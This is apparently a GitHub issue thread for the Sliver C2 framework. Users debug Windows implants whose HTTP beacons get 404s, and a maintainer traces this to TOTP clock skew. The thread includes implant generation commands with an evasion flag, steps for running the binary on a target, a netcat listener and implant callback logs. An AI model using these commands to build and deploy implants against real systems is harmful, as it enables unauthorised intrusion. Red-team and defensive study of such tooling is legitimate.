Nariod
commented
2 years ago After a bit of debugging, it appears that the HTTP Sliver handler is answering with HTTP 404 to implant requests:
Closed Nariod closed 2 years ago
Nariod
commented
2 years ago After a bit of debugging, it appears that the HTTP Sliver handler is answering with HTTP 404 to implant requests:
emmnoi
commented
2 years ago I have the same problem!
Nariod
commented
2 years ago A bit more debugging, HTTP beacon for Linux seems functional:
However, the following are not:
generate --http http://MYDOMAIN:80 --evasion --os windows
generate beacon --http http://MYDOMAIN:80 --evasion --os windows
generate --http http://MYDOMAIN:80 --os windows
Conclusion: The problem seems to be specific to windows implants.
moloch--
commented
2 years ago Enable debug in the implant (pass the --debug flag to generate) and let us know what the logs look like.
moloch--
commented
2 years ago It may be your clocks are are our of sync and you need to disable TOTP validation in the handler.
Nariod
commented
2 years ago PS C:\Users\nariod\Desktop\Maldev\debug> .\BEAUTIFUL_DUTY.exe
2022/09/14 06:52:55 sliver.go:99: Hello my name is BEAUTIFUL_DUTY
2022/09/14 06:52:55 limits.go:52: Limit checks completed
2022/09/14 06:52:55 sliver.go:117: Running in session mode
2022/09/14 06:52:55 session.go:67: Starting interactive session connection loop ...
2022/09/14 06:52:55 transports.go:41: Starting c2 url generator () ...
2022/09/14 06:52:55 transports.go:87: Return generator: (chan *url.URL)(0xc0001342a0)
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 session.go:84: Next CC = http://MYDOMAIN:80
2022/09/14 06:52:55 session.go:84: Next CC = http://MYDOMAIN:80
2022/09/14 06:52:55 transports.go:75: Yield c2 uri = 'http://MYDOMAIN:80'
2022/09/14 06:52:55 session.go:172: Connecting -> http(s)://MYDOMAIN:80
2022/09/14 06:52:55 drivers_windows.go:36: Using go http driver
2022/09/14 06:52:55 provider_windows.go:145: [proxy.Provider.readWinHttpProxy] No proxy discovered via AutoDetect: winapi error #12180
2022/09/14 06:52:55 httpclient.go:675: [http] segments = [], filename = admin, ext = php
2022/09/14 06:52:55 crypto.go:190: TOTP Code: 66813256
2022/09/14 06:52:55 httpclient.go:337: [http] POST -> https://MYDOMAIN:80/admin.html?qg=6681w3256&t=52y181998 (106 bytes)
2022/09/14 06:52:56 httpclient.go:343: [http] http response error: Post "https://MYDOMAIN:80/admin.html?qg=6681w3256&t=52y181998": http: server gave HTTP response to HTTPS client
2022/09/14 06:52:56 drivers_windows.go:36: Using go http driver
2022/09/14 06:52:56 provider_windows.go:145: [proxy.Provider.readWinHttpProxy] No proxy discovered via AutoDetect: winapi error #12180
2022/09/14 06:52:56 httpclient.go:675: [http] segments = [oauth php oauth2callback oauth2callback], filename = index, ext = php
2022/09/14 06:52:56 crypto.go:190: TOTP Code: 66813256
2022/09/14 06:52:56 httpclient.go:337: [http] POST -> http://MYDOMAIN:80/oauth/php/oauth2callback/oauth2callback/index.html?c=67256194&hh=6681l3256 (106 bytes)
2022/09/14 06:52:56 httpclient.go:349: [http] non-200 response (404): &{404 Not Found 404 HTTP/1.1 1 1 map[Cache-Control:[no-store, no-cache, must-revalidate] Content-Length:[0] Date:[Wed, 14 Sep 2022 06:54:22 GMT]] 0xc0001b9680 0 [] false false map[] 0xc00011a600 <nil>}
2022/09/14 06:52:56 session.go:178: http(s) connection error send failed
2022/09/14 06:52:56 sliver.go:156: [session] failed to establish connection: send failed
2022/09/14 06:52:56 sliver.go:136: Reconnect sleep: 1m0sSliver commands:
moloch--
commented
2 years ago Try http --disable-otp or https --disable-otp when starting the listener
Nariod
commented
2 years ago Try
http --disable-otporhttps --disable-otpwhen starting the listener
Yep, this worked ! Thanks for the support :)
realalexandergeorgiev
commented
1 year ago I just had the same issue. disabling OTP check was a good workaround, but my time was indeed off a few minutes. syncing it solved the issue. Thank you @moloch--
Describe the bug Sliver HTTP handler is not accepting incoming session traffic.
To Reproduce Using Sliver 1.5.26 (latest at time of writing) 1 - sudo systemctl restart 2 - Sliver > http --lport 80 3 - Sliver > generate --http http://MY.DOMAIN:80?driver=wininet --evasion --os windows 4 - Execute binary on target 5 - No session on Sliver 6 - Sliver > jobs -K 7 - sudo nc -nvlp 80 8 - see Sliver session HTTP requests
Expected behavior HTTP handler accepting Sliver sessions
Screenshots
Desktop (please complete the following information):
Additional context Problem first identified on Kali with Ubuntu machine as redirector. Installed Sliver on the Ubuntu front machine to confirm the bug.